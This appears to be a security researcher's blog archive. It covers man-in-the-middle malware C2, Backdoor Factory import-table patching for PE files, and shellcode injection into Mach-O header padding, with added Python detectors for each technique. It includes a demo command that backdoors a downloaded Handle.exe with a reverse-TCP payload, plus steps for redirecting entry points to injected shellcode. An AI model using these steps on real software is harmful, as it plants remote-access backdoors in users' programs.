Many malware analysts work in a vacuum. Because of OPSEC, they cannot share their samples and indicators of compromise (IOCs) openly on the Internet. This balkanization of knowledge is not equipped to find a MitM malware C2 infrastructure. To the malware analyst, the contacted web server will appear to be the source of commands, especially for sites that are not popular (Ex: http://www.millerscleaners.com/). The analyst will write the site up as the C2, finish the network forensics part of the investigation, and continue on to other tasks. The true C2 will go undetected; the patsy site will be determined to be compromised, blocked within that organization, and at worst shared with a closed-source threat intelligence group.</div>
<div>
<br /></div>
<div>
Determining if the web server is compromised in this scenario will depend on the implementation of the malware. In contrast to the prior example, if the malware uses multiple HTTP servers, especially popular sites, the analyst might determine that not all sites are compromised. At this point, the analyst could take the risk of checking out of bounds via Tor network or a VPN service. This would be a calculated risk as Malware authors of traditional end point C2s could have their servers configured to recognize requests from Tor exit nodes or outside of their target networks, thereby alerting that their malware samples have been found.</div>
<div>
<br /></div>
<div>
The other way to catch this type of threat is to monitor the change in server responses from node to node to determine when the C2 injects traffic - currently an impossible task. To stop this potential threat we need HTTPS everywhere and strong host security that is not undermined by vendor implementations. </div>
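The channel described in steps (1) to (6) leaves two things on the wire that an analyst can look for without knowing the key: a header that is not part of the site's normal exchange whose value is a base64 blob of binary-looking data, and an HTML comment carrying such a blob. The scanner below is an added example (not the author's unreleased PoC) that runs those checks over one request/response pair; the header baselines, thresholds and sample messages are constructed for illustration and would be tuned per site.

```python
"""Flag in-band C2 markers in one HTTP exchange: a non-baseline header whose
value is a base64 blob of binary-looking data, and an HTML comment carrying
one.  Added example, not the post's PoC; baselines and thresholds are assumed."""
import base64
import binascii
import math
import re
from collections import Counter

# Headers a plain GET / 200 exchange normally carries (assumed baseline).
BASELINE_REQUEST = {
    "host", "user-agent", "accept", "accept-language", "accept-encoding",
    "connection", "cookie", "referer", "cache-control", "upgrade-insecure-requests",
}
BASELINE_RESPONSE = {
    "date", "server", "content-type", "content-length", "connection", "cache-control",
    "last-modified", "etag", "set-cookie", "vary", "content-encoding", "expires",
}
MIN_DECODED_LEN = 16   # skip short tokens such as nonces and cache keys
MAX_PRINTABLE = 0.7    # decoded text sits near 1.0, ciphertext near 0.37
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)


def parse_message(raw: str):
    """Split an HTTP/1.x message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def blob_stats(token: str):
    """Return stats if token is valid base64 of binary-looking bytes, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < MIN_DECODED_LEN:
        return None
    printable = sum(32 <= b < 127 for b in raw) / len(raw)
    if printable >= MAX_PRINTABLE:
        return None
    counts = Counter(raw)
    entropy = -sum(c / len(raw) * math.log2(c / len(raw)) for c in counts.values())
    return {"decoded_len": len(raw), "printable": round(printable, 2),
            "entropy": round(entropy, 2)}


def scan_exchange(request: str, response: str) -> list:
    """Findings for the three injection points in the post's diagram."""
    findings = []
    _, req_headers, _ = parse_message(request)
    for name, value in req_headers:
        if name not in BASELINE_REQUEST and (stats := blob_stats(value)):
            findings.append({"where": "request-header", "name": name, **stats})
    _, resp_headers, body = parse_message(response)
    for name, value in resp_headers:
        if name not in BASELINE_RESPONSE and (stats := blob_stats(value)):
            findings.append({"where": "response-header", "name": name, **stats})
    for comment in HTML_COMMENT.finditer(body):
        for run in B64_RUN.findall(comment.group(1)):
            if stats := blob_stats(run):
                findings.append({"where": "html-comment",
                                 "name": comment.group(1).strip()[:32], **stats})
    return findings


# Constructed stand-in for an encrypted beacon: 32 distinct, mostly non-printable bytes.
SAMPLE_BLOB = base64.b64encode(bytes(range(0, 256, 8))).decode()

C2_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
              "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/36.0\r\n"
              f"Accept: text/html\r\nX-Cache-Status: {SAMPLE_BLOB}\r\n\r\n")
C2_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: nginx\r\n"
               f"X-Trace: {SAMPLE_BLOB}\r\n\r\n"
               f"<html><!-- cfg:{SAMPLE_BLOB} --><body><p>Welcome</p></body></html>")
CLEAN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/36.0\r\n"
                 "Accept: text/html\r\nX-Requested-With: XMLHttpRequest\r\n\r\n")
CLEAN_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: nginx\r\n\r\n"
                  "<html><!-- main navigation --><body><p>Welcome</p></body></html>")

if __name__ == "__main__":
    for finding in scan_exchange(C2_REQUEST, C2_RESPONSE):
        print(finding)
    print("clean exchange findings:", scan_exchange(CLEAN_REQUEST, CLEAN_RESPONSE))
```

The tagged User-Agent itself is better found by frequency analysis across many hosts than by a per-message rule, which is why the scanner does not try to judge it.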
<h3>
</h3>
<div>
<br /></div>
<h3>
In Conclusion</h3>
<div>
<br /></div>
<div>
I encourage malware analysts to look at malware C2 implementations differently and consider this as a potential avenue, albeit improbable. For companies with massive amounts of historical malware C2 data, it would be an interesting exercise to determine which malware samples and classes could fall into this type of C2.</div>
<div>
<br /></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-40512081176292204672015-02-18T13:30:00.002-08:002015-02-19T11:23:43.238-08:00New BDF Feature: Import Table 'Patching'The PE file Import Table - what does it do?<br />
<br />
It is what makes a windows binary a portable executable.<br />
<br />
Think of it as a reference table for all the Windows APIs (or custom APIs) that will be called by the binary. It's created at compile time.<br />
<br />
Within the Import Table there are thunks; these are populated with winAPI addresses at load time. This is advantageous because, with ASLR, you cannot have static API addresses programmed into the thunks, and the binary would not be portable because of API address differences between Windows operating systems. <br />
<br />
These APIs are pointed to by an Import Directory Table with an entry for each imported API. Within this structure there are pointers to the API thunk, and the thunk is populated with an address at load time in memory. When the binary was compiled, each program call to each thunk was statically set - e.g. position dependent. The relative virtual address (RVA) of these thunks from the module entry in memory does not change between executions; it's always the same RVA offset for that particular binary until it is recompiled, statically modified, or redirected in memory via hooking.<br />
<br />
BDF began by using Metasploit windows shellcode for payloads. It worked. Stephen Fewer's hash lookup api is great: it is position independent and great for exploitation. While AV evasion wasn't perfect, code cave jumping helped with that issue. However, EMET blocks Metasploit payloads because of the way Stephen Fewer's hash lookup api works, using the Kernel32.dll EAT to find LoadLibrary/GetProcAddress and then the API address to be called (or rather jumped to via a jmp instruction). As such I wanted to move away from the hash lookup api to using the Import Table directly. Because the <a href="https://github.com/secretsquirrel/the-backdoor-factory">Backdoor Factory</a> (BDF) statically patches binaries, and compiled binaries use position dependent code, BDF should too. BDF could use the APIs already in the Import Table to build a payload - LoadLibraryA and GetProcAddress is all you need. Most binaries have these two APIs. However, not all of them.<br />
<br />
Enter IAT 'patching'.<br />
<br />
I call it 'patching', but rather it is redirection and addition of new APIs.<br />
<br />
Adding imports to an existing IAT would be ludicrous and somewhat painful. I do want to attempt this at some point when I have time and an appetite for self destruction. TL;DR One would need to add an API in the middle of the Import Table, changing the following API offsets and size for the section, potentially changing offsets for entire sections afterwards, and other yet unknown potential offsets.<br />
<br />
So what did I do?<br />
<br />
1. Copy the Import Directory Table into a new PE section appended on the end of the binary.<br />
2. Change the Import Table pointer in the Optional Header to the new Import Directory Table in the new section.<br />
3. Instead of ending the Import Directory Table with a null byte entry, build a new Import Table (of sorts) right onto the end of it, following standard convention (<a href="http://sandsprite.com/CodeStuff/Understanding_imports.html">http://sandsprite.com/CodeStuff/Understanding_imports.html</a>, <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx</a>).<br />
<br />
And that's it.<br />
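The three steps above leave a footprint a reviewer can check for: the Optional Header's import data directory points into the section that was appended last rather than into the section the linker used. The parser below is an added example (not BDF code) that walks the PE32/PE32+ headers with nothing but struct and reports where the import directory lives; the header-only images built by build_pe() and the section names in LINKER_IMPORT_HOMES are constructed assumptions for the self-test.

```python
"""Report which section holds a PE's import directory and whether that is the
last section on disk, the footprint of relocating the Import Directory Table
into an appended section.  Added example, not BDF code; build_pe() makes
header-only images for testing that carry no code."""
import struct

IMAGE_DIRECTORY_ENTRY_IMPORT = 1
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Sections in which linkers normally place the import directory (assumption).
LINKER_IMPORT_HOMES = {".idata", ".rdata", ".data", ".text"}


def parse_pe(data: bytes) -> dict:
    """Minimal PE32/PE32+ header walk: import data directory plus section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                            # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = {0x10B: 96, 0x20B: 112}[magic]                  # data directory array
    ndirs = struct.unpack_from("<I", data, opt + dd_off - 4)[0]
    import_rva = import_size = 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_IMPORT:
        import_rva, import_size = struct.unpack_from(
            "<II", data, opt + dd_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    sections = []
    for i in range(nsections):
        (name, vsize, va, rawsize, rawptr, _, _, _, _, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
                         "chars": chars})
    return {"import_rva": import_rva, "import_size": import_size, "sections": sections}


def section_for_rva(sections: list, rva: int):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def check_import_location(data: bytes) -> dict:
    pe = parse_pe(data)
    holder = section_for_rva(pe["sections"], pe["import_rva"])
    last = max(pe["sections"], key=lambda s: s["rawptr"])
    chars = holder["chars"] if holder else 0
    result = {
        "section": holder["name"] if holder else None,
        "in_last_section": holder is last,
        "rwx": bool(chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE),
    }
    # Heuristic: imports living in the trailing section under an unfamiliar
    # name is the shape of the rebuild described in the post.
    result["suspicious"] = result["in_last_section"] and result["section"] not in LINKER_IMPORT_HOMES
    return result


def build_pe(sections: list, import_rva: int, pe32plus: bool = False) -> bytes:
    """Constructed header-only PE: sections are (name, va, vsize, rawptr, rawsize, chars)."""
    opt_size = 240 if pe32plus else 224
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)         # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                                   len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    dd_off = 112 if pe32plus else 96
    struct.pack_into("<I", opt, dd_off - 4, 16)              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, dd_off + 8, import_rva, 0x80)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), vs, va, rs, rp,
                                 0, 0, 0, 0, ch) for n, va, vs, rp, rs, ch in sections)
    return dos + coff + bytes(opt) + table


# Constructed layouts: a typical image, and the same image with the import
# directory repointed into an appended section.
TYPICAL = [(".text", 0x1000, 0x3000, 0x400, 0x3000, 0x60000020),
           (".rdata", 0x4000, 0x1000, 0x3400, 0x1000, 0x40000040),
           (".data", 0x5000, 0x800, 0x4400, 0x800, 0xC0000040)]
REBUILT = TYPICAL + [(".new", 0x6000, 0x1000, 0x4C00, 0x1000, 0xE0000020)]

if __name__ == "__main__":
    print(check_import_location(build_pe(TYPICAL, 0x4100)))
    print(check_import_location(build_pe(REBUILT, 0x6000)))
```
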
<br />
BDF windows payloads that have 'iat' in the name will look for APIs in the Import Table first and, if they are missing, will automatically add those missing APIs into the new Import Table in the new section. I just <a href="https://github.com/secretsquirrel/the-backdoor-factory/commit/a7ff507f504ba4b8997432ce37700f9397ce15d5">added</a> a new payload that uses the Import Table for x64 PE files, iat_reverse_tcp, the same concept as the x86 version added back in May 2014. I'm making the move to get away from Metasploit payloads, but I still want to use meterpreter and other payloads that pentesters are used to. Stay tuned.<br />
<br />
Right now these payloads use LoadLibraryA/GetProcAddress to load a payload.<br />
<br />
In the future, I will get away from these two APIs and use the actual APIs needed for each payload since I can add them in a new Import Table if they do not exist in the original Import Table.<br />
<br />
Other uses? Using this technique I could rebuild an Import Table or recreate one from API calls in memory. From malware perhaps or packed executables - I don't know.<br />
<br />
If you can think of any other uses for Import Table rebuilding contact me on twitter: @midnite_runr<br />
<br />
Simple Demo:<br />
$ wget http://live.sysinternals.com/Handle.exe<br />
<br />
$ ./backdoor.py -f Handle.exe -s iat_reverse_tcp -P 8080 -H 192.168.1.1 -q<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories <br />
[*] Adding New Section for updated Import Table<br />
[!] Adding LoadLibraryA Thunk in new IAT #<-- import table creation<br />
[*] Gathering file info #<-- updating PE info<br />
[*] Checking updated IAT for thunks #<-- checking for success<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories<br />
[*] Looking for and setting selected shellcode<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for caves that will fit the minimum shellcode length of 382<br />
[*] All caves lengths: (382,)<br />
<br />midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-9833275980326935152014-08-18T10:55:00.001-07:002015-01-28T19:53:26.240-08:00Patching the Mach-o Format the Simple and Easy WayThis is a strange post for me.<br />
<br />
I'm relatively new to mac research. So when I find something new that seems cutting edge but relatively simple, I question it. Has anyone else done this before? Is this in the public domain? Is this in the academic domain that I have no way of researching?<br />
<br />
I google like hell.<br />
<br />
I question myself (for a short period of time).<br />
<br />
I write my congressman.<br />
<br />
I wait.<br />
<br />
I try to contact people in the know without letting them know too much.<br />
<br />
Then I'm afraid I've said too much.<br />
<br />
So here we are.<br />
<br />
Thanks to the guys in #osxre (fG!) for telling me what would and would not work.<br />
<br />
This is my 'new' method for patching the mach-o format. <br />
<br />
The mach-o format is simply nested segments in a very straightforward waterfall layout that IMHO is much simpler than the PE and ELF formats.<br />
<br />
As you have seen many times, this is the format, no seriously, this is it:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiay7mrWb83vdvCWUMNPo2cU6o_3_Z3ASyma8V-c3_ZpGZio0XqaHcvOvGRejkuLevhzab61AGpY8AzPMwL9jeXUf41ZTHgpxguTUPokTn0OVUylxT5dnW5NZAMm3y5FvNHzudrcjPxjgE/s1600/mach_o_format.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiay7mrWb83vdvCWUMNPo2cU6o_3_Z3ASyma8V-c3_ZpGZio0XqaHcvOvGRejkuLevhzab61AGpY8AzPMwL9jeXUf41ZTHgpxguTUPokTn0OVUylxT5dnW5NZAMm3y5FvNHzudrcjPxjgE/s1600/mach_o_format.png" /></a></div>
<br />
From: <a href="https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html">https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html</a><br />
<br />
What is so special about this format?<br />
<br />
It is very <strike>hackable </strike>easy to modify, far easier than ELF and PE formats.<br />
<br />
There are not many code caves in a mach-o executable:<br />
$ file ls.mach-o<br />
ls.mach-o: Mach-O 64-bit executable x86_64<br />
<br />
$ python ./find_caves.py ls.mach-o<br />
[*] Looking in ls.mach-o for caves<br />
[*] Looking for caves of 50 byes in size<br />
No section<br />
->Begin Cave 0x736<br />
->End of Cave 0x10f8 # <--- Remember this one<br />
Size of Cave (int) 2498<br />
**************************************************<br />
No section<br />
->Begin Cave 0x4ff6<br />
->End of Cave 0x5038<br />
Size of Cave (int) 66<br />
**************************************************<br />
No section<br />
->Begin Cave 0x54d1<br />
->End of Cave 0x6000<br />
Size of Cave (int) 2863<br />
**************************************************<br />
[*] Total of 3 caves found<br />
<br />
The caves are large, but they are not in a section that includes read/execute attributes.<br />
<br />
But let's look at the beginning of the __TEXT,__text segment/section:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjswPX3GejWGrKe7DV7hWhxEnpzqQZ024FdXcWjo7vQ-Nl4swXE-74UOPSdCbNQhjt-cENaCp_hklLgAvg7fCCfUgcXiBsp5BeBUQgGiNwOOKV6n7aZb3gT6U2y-euZUsvOVz7Oqa9Dy0k/s1600/_text_before.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjswPX3GejWGrKe7DV7hWhxEnpzqQZ024FdXcWjo7vQ-Nl4swXE-74UOPSdCbNQhjt-cENaCp_hklLgAvg7fCCfUgcXiBsp5BeBUQgGiNwOOKV6n7aZb3gT6U2y-euZUsvOVz7Oqa9Dy0k/s1600/_text_before.png" height="155" width="400" /></a></div>
<br />
<br />
Let's look at lower address space, what's going on?<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr-J8FoHJ4SETM7KlELzZLlQpn6Fc9_2a7B_0ItI66IHRPVGOgIHTewhZsRvKAIPGgXvOX37fw7_srRd3eAS2D8gmusHazwFRKC3Uc-hYKji-erg2lDln7IpDaqnHjeIWQcGYoh_CTEIs/s1600/_text_before_z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr-J8FoHJ4SETM7KlELzZLlQpn6Fc9_2a7B_0ItI66IHRPVGOgIHTewhZsRvKAIPGgXvOX37fw7_srRd3eAS2D8gmusHazwFRKC3Uc-hYKji-erg2lDln7IpDaqnHjeIWQcGYoh_CTEIs/s1600/_text_before_z.png" height="32" width="400" /></a></div>
<br />
<br />
Continuing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3MipD68QqF-UPPlNeQwuB2I2Is34F0cqXHAgl1SWsjQ_4sQgHYdbno09up0WePUYHD8QS1FwQhO-w_2N7xB7AKqDDX4RB3RBXgBACAhXoGvG0MyVfd14b7Z5BLKF_gLj-pkpkrIfp5Fo/s1600/_text_before_mz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3MipD68QqF-UPPlNeQwuB2I2Is34F0cqXHAgl1SWsjQ_4sQgHYdbno09up0WePUYHD8QS1FwQhO-w_2N7xB7AKqDDX4RB3RBXgBACAhXoGvG0MyVfd14b7Z5BLKF_gLj-pkpkrIfp5Fo/s1600/_text_before_mz.png" height="112" width="400" /></a></div>
<br />
Continuing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbkcnfM86aPgJy_Rg1EQQXaTpXE3hmv6LvwrUWkFoACPiF-sLTqrXW8S7gWIMF8kHVtXuoPzWIutm8tGefF1aWKvZ-FsxpgE1hVDYavwqMYE_5eCgkBomfXxNE-OeLL4asJdsvLWtylA/s1600/_text_before_mzz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbkcnfM86aPgJy_Rg1EQQXaTpXE3hmv6LvwrUWkFoACPiF-sLTqrXW8S7gWIMF8kHVtXuoPzWIutm8tGefF1aWKvZ-FsxpgE1hVDYavwqMYE_5eCgkBomfXxNE-OeLL4asJdsvLWtylA/s1600/_text_before_mzz.png" height="400" width="345" /></a></div>
<br />
<br />
You get the idea. Many zeros. Much waste. Wow.<br />
<b><br /></b>
<b>But that looks like enough room for shellcode, right? (The answer is yes).</b><br />
<br />
How do we make that part of the __TEXT,__text segment/section?<br />
<br />
Easy:<br />
<br />
1. Change the __text section Address and Offset to the beginning of your shellcode and Size to accommodate your new shellcode.<br />
<br />
<b>Update 1/28/2014: </b>This step is not necessary. Greetz to fG!: <a href="https://reverse.put.as/2012/02/02/anti-disassembly-obfuscation-1-apple-doesnt-follow-their-own-mach-o-specifications/">https://reverse.put.as/2012/02/02/anti-disassembly-obfuscation-1-apple-doesnt-follow-their-own-mach-o-specifications/</a><br />
<br />
Before:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvtBOCCJ9l54feaIt6s4NBFsF2t7Azpi23aGOMgYtBwTsdgWCRiTPZNzYUei2Fo9LDl6dGOnjG65FHWvz14NUeXZIdq7PV8gMNXahPuxcBphS9J1Y1bs5T5aaz2XMMKiQEhxYlv9Rlkw/s1600/_text_section_before.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvtBOCCJ9l54feaIt6s4NBFsF2t7Azpi23aGOMgYtBwTsdgWCRiTPZNzYUei2Fo9LDl6dGOnjG65FHWvz14NUeXZIdq7PV8gMNXahPuxcBphS9J1Y1bs5T5aaz2XMMKiQEhxYlv9Rlkw/s1600/_text_section_before.png" height="297" width="640" /></a></div>
<br />
After:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjygwg_mCg310y8QngUqEcKopvXFmEYpuoxsW9rlTIDxLtqfWUGGg3JaJG92TIvmTZi08V5eUq7IFUsZQNrK0MOZPS8cZ8sL06BGfShLRgI8s_o1tTpd969zuAVnUDhqoxe_7K7mmLc87Q/s1600/_text_section_after.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjygwg_mCg310y8QngUqEcKopvXFmEYpuoxsW9rlTIDxLtqfWUGGg3JaJG92TIvmTZi08V5eUq7IFUsZQNrK0MOZPS8cZ8sL06BGfShLRgI8s_o1tTpd969zuAVnUDhqoxe_7K7mmLc87Q/s1600/_text_section_after.png" height="300" width="640" /></a></div>
<br />
<br />
2. Change LC_MAIN to point to the __text Offset, or, if it is a LC_UNIXTHREAD binary, make sure [eip|rip] points to the new __text Address.<br />
<br />
Before:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUmtUix_5qltu17vf9lzSQxyLBC6zIv302ITjCW95ks8PfD9_FCfBnhKp-oaKkwzjyEeLfZ72JR6vz5sN5Vdg36vhWX_ZRtXwwIYm8MW0uzX18BWJ8a08sEx2KEEagTaLpZCxtT4fQPFk/s1600/LC_MAIN_before.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUmtUix_5qltu17vf9lzSQxyLBC6zIv302ITjCW95ks8PfD9_FCfBnhKp-oaKkwzjyEeLfZ72JR6vz5sN5Vdg36vhWX_ZRtXwwIYm8MW0uzX18BWJ8a08sEx2KEEagTaLpZCxtT4fQPFk/s1600/LC_MAIN_before.png" height="302" width="640" /></a><br />
<br />
After:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz-4ViyoG-nYVRTlbWLWP3XoLBqZQOxrR0F8gPFeh4UR9fdUQqDMP9H12BFjaaMR37VpUcLwBIN_bjT17tfYrIrcnOoDHRGY6IpqFYcVxRRHszlvZF-buHug-QXR_RAYzQ3h5xH4qqYA/s1600/LC_MAIN_after.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz-4ViyoG-nYVRTlbWLWP3XoLBqZQOxrR0F8gPFeh4UR9fdUQqDMP9H12BFjaaMR37VpUcLwBIN_bjT17tfYrIrcnOoDHRGY6IpqFYcVxRRHszlvZF-buHug-QXR_RAYzQ3h5xH4qqYA/s1600/LC_MAIN_after.png" height="301" width="640" /></a><br />
<br />
<br />
3. You need to fork() your shellcode so that it continues after the parent has completed, and you need to make sure that whatever LC_MAIN/LC_UNIXTHREAD was pointing to originally, whether dyld or the __text section, is the first thing that is executed. Here I have the shellcode that I use in my POC.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbweug7b6J8im_ET9nKmW2XpamQgpp877IYIkDWFDUldamozwLdDbn6DNxIHiH_vg6LA-gchAEbMd5XxulCKShz6_uy0NMdkIxyX7xt5gY-ZJQFvRmJrn3Na5CleuClM_WwxO7ouMn0kw/s1600/shellcode_fork.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbweug7b6J8im_ET9nKmW2XpamQgpp877IYIkDWFDUldamozwLdDbn6DNxIHiH_vg6LA-gchAEbMd5XxulCKShz6_uy0NMdkIxyX7xt5gY-ZJQFvRmJrn3Na5CleuClM_WwxO7ouMn0kw/s1600/shellcode_fork.png" height="240" width="640" /></a></div>
<br />
<br />
And that's it. No really. That's it.<br />
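Steps 1 to 3 move the entry point into the zero padding that sits between the load commands and __text, and the update to step 1 means __text's own Offset and Size may be left untouched. The check below is an added example (not BDF code) that walks a 64-bit Mach-O's load commands and reports whether LC_MAIN's entryoff, or rip from an LC_UNIXTHREAD x86_64 state, lands inside __TEXT,__text or inside that padding; build_macho64() constructs header-only images for the self-test, and the x86_64 thread-state register order is assumed.

```python
"""Check where a 64-bit Mach-O's entry point lands relative to __TEXT,__text.
Added example, not BDF code; build_macho64() makes header-only images for
testing and the thread-state layout assumed is x86_64."""
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_SEGMENT_64 = 0x19
LC_UNIXTHREAD = 0x5
LC_MAIN = 0x80000028
X86_THREAD_STATE64 = 4
RIP_INDEX = 16          # rax..r15 precede rip in x86_thread_state64_t


def parse_macho64(data: bytes) -> dict:
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from("<8I", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O")
    info = {"header_end": 32 + sizeofcmds, "text_seg": None, "text": None,
            "entry_off": None, "entry_addr": None}
    off = 32
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd == LC_SEGMENT_64:
            segname = data[off + 8:off + 24].rstrip(b"\0")
            vmaddr, _, fileoff, _, _, _, nsects, _ = struct.unpack_from("<QQQQIIII", data, off + 24)
            if segname == b"__TEXT":
                info["text_seg"] = {"vmaddr": vmaddr, "fileoff": fileoff}
            for i in range(nsects):
                s = off + 72 + 80 * i                        # section_64 entries follow
                sectname = data[s:s + 16].rstrip(b"\0")
                addr, size, soff = struct.unpack_from("<QQI", data, s + 32)
                if segname == b"__TEXT" and sectname == b"__text":
                    info["text"] = {"addr": addr, "size": size, "offset": soff}
        elif cmd == LC_MAIN:
            info["entry_off"] = struct.unpack_from("<Q", data, off + 8)[0]
        elif cmd == LC_UNIXTHREAD:
            flavor = struct.unpack_from("<I", data, off + 8)[0]
            if flavor == X86_THREAD_STATE64:
                info["entry_addr"] = struct.unpack_from("<Q", data, off + 16 + 8 * RIP_INDEX)[0]
        off += cmdsize
    return info


def check_entry(data: bytes) -> dict:
    m = parse_macho64(data)
    text, seg = m["text"], m["text_seg"]
    if text is None or seg is None:
        raise ValueError("no __TEXT,__text section")
    if m["entry_off"] is not None:
        kind, entry = "LC_MAIN", m["entry_off"]
    elif m["entry_addr"] is not None:
        # rip is a virtual address; translate it through __TEXT to a file offset.
        kind, entry = "LC_UNIXTHREAD", m["entry_addr"] - seg["vmaddr"] + seg["fileoff"]
    else:
        raise ValueError("no entry point load command")
    in_text = text["offset"] <= entry < text["offset"] + text["size"]
    in_padding = m["header_end"] <= entry < text["offset"]
    return {"kind": kind, "entry_offset": entry, "text_offset": text["offset"],
            "padding_bytes": text["offset"] - m["header_end"],
            "in_text": in_text, "in_header_padding": in_padding,
            "suspicious": not in_text}


def build_macho64(text_offset: int, text_size: int, entry_off: int,
                  unixthread: bool = False, vmaddr: int = 0x100000000) -> bytes:
    """Constructed header-only x86_64 Mach-O: __TEXT with __text plus one entry command."""
    seg = struct.pack("<II16sQQQQIIII", LC_SEGMENT_64, 72 + 80, b"__TEXT",
                      vmaddr, 0x1000, 0, 0x1000, 7, 5, 1, 0)
    sect = struct.pack("<16s16sQQIIIIIIII", b"__text", b"__TEXT", vmaddr + text_offset,
                       text_size, text_offset, 4, 0, 0, 0x80000400, 0, 0, 0)
    if unixthread:
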